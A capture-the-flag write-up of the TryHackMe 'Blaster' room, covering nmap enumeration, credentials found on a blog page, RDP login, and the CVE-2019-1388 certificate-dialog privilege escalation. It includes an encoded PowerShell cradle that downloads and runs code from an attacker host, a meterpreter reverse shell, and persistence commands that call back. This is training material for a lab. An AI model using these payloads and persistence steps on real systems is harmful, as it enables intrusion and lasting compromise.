TryHackMe: Blaster Write-up
Objective
Challenge Link: Blaster
The room objective is to look for alternative modes of exploitation without the use of Metasploit or any exploitation tools in general beyond nmap and dirbuster. This is the vulnerability we will exploit -> CVE-2019-1388
Enumeration
I first started basic scanning, but the host seems to block ping probes. To prevent this, I used -Pn option
1
2
3
4
5
6
7
8
9
10
nmap -Pn 10.10.119.236
Starting Nmap 7.95 ( https://nmap.org )
Nmap scan report for 10.10.119.236
Host is up (0.14s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 11.92 seconds
I also used the -A option to reveal more information about the target opening services.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
nmap -A -p80,3389 -n -Pn 10.10.119.236
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 09:17 EDT
Nmap scan report for 10.10.119.236
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETROWEB
| NetBIOS_Domain_Name: RETROWEB
| NetBIOS_Computer_Name: RETROWEB
| DNS_Domain_Name: RetroWeb
| DNS_Computer_Name: RetroWeb
| Product_Version: 10.0.14393
|_ System_Time: 2025-07-21T13:17:39+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2025-07-20T12:50:17
|_Not valid after: 2026-01-19T12:50:17
|_ssl-date: 2025-07-21T13:17:44+00:00; +8s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (86%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- Port 80 -> Running Microsoft IIS 10.0 (Windows web server)
- Port 3389 -> Running Microsoft Terminal Services (RDP)
Check the running web server first.
I used Dirsearch to search for hidden pages.
clicking on Tron Arcade Cabinet, will prompt:
The blog was posted by wade
The error from the login page confirms that the username is Wade, but we need to find the password. Explore the remaining pages, and you will find on the page Ready Player One, Wade posted his password in the comment section.
Now that we have some credentials, let’s test them on the second open service: RDP.
RDP
Login to the Windows machine remotely using xfreerdp tool.
1
xfreerdp /u:wade /p:parzival /v:10.10.119.236
To search for internet history, search in Internet Explorer. For some reason, it only shows me today’s history.
Exploit CVE-2019-1388
CVE-2019-1388 is a privilege escalation vulnerability that affects the Windows Certificate Dialog. It occurs when a user runs a signed executable like hhupd.exe, and the dialog fails to enforce privilege separation correctly
To exploit it:
- Double-click on
hhupd.exe. - In the prompt that appears, click “
Show more details”.
- Then click “
Show information about the publisher's certificate.”
- In the certificate window, click on the “
Issued by” link.
- This opens Internet Explorer with elevated privileges.
- Press
Ctrl + Sto open the Save As window. - In the File Explorer window, type
cmdin the address bar and hit Enter. This gives you a command prompt with administrator privileges, effectively bypassing UAC.
Persistence
To establish a persistence on the target machine, we will use this module from metasploit exploit/multi/script/web_delivery' -> The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be a
n address on the local machine or 0.0.0.0 to listen on all addre
sses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Python
View the full module info with the info, or info -d command.
Set your LHOST and LPORT, and set the exploit target to PowerShell since Python is not installed on Windows by default.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
=================
Id Name
-- ----
0 Python
1 PHP
=> 2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X
Finally, set the payload
1
2
msf6 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
Last Check:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf6 exploit(multi/script/web_delivery) > show options
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be a
n address on the local machine or 0.0.0.0 to listen on all addre
sses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.9.8.180 yes The local listener hostname
LPORT 80 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
2 PSH
View the full module info with the info, or info -d command.
Run the payload
1
2
3
4
5
6
7
8
9
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started HTTP reverse handler on http://10.9.8.180:80
[*] Using URL: http://10.9.8.180:8080/GtWFCGzoAD
[*] Server started.
[*] Run the following command on the target machine:
msf6 exploit(multi/script/web_delivery) > powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABvAEEAeAA0AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAG8AQQB4ADQALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABvAEEAeAA0AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AOQAuADgALgAxADgAMAA6ADgAMAA4ADAALwBHAHQAVwBGAEMARwB6AG8AQQBEAC8AQwBaAGQAZQBaAEgAcwAxAFUARgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AOQAuADgALgAxADgAMAA6ADgAMAA4ADAALwBHAHQAVwBGAEMARwB6AG8AQQBEACcAKQApADsA
Now we can copy the payload and paste it to the target machine with administrator privileges.
Once the payload runs on the target machine, a session will be created in our Metasploit console.
1
2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
To automatically start the agent when the system boots run these commands.
1
2
3
meterpreter > run persistence -X
meterpreter > run persistence -U -i 5 -p 80 -r 10.9.8.180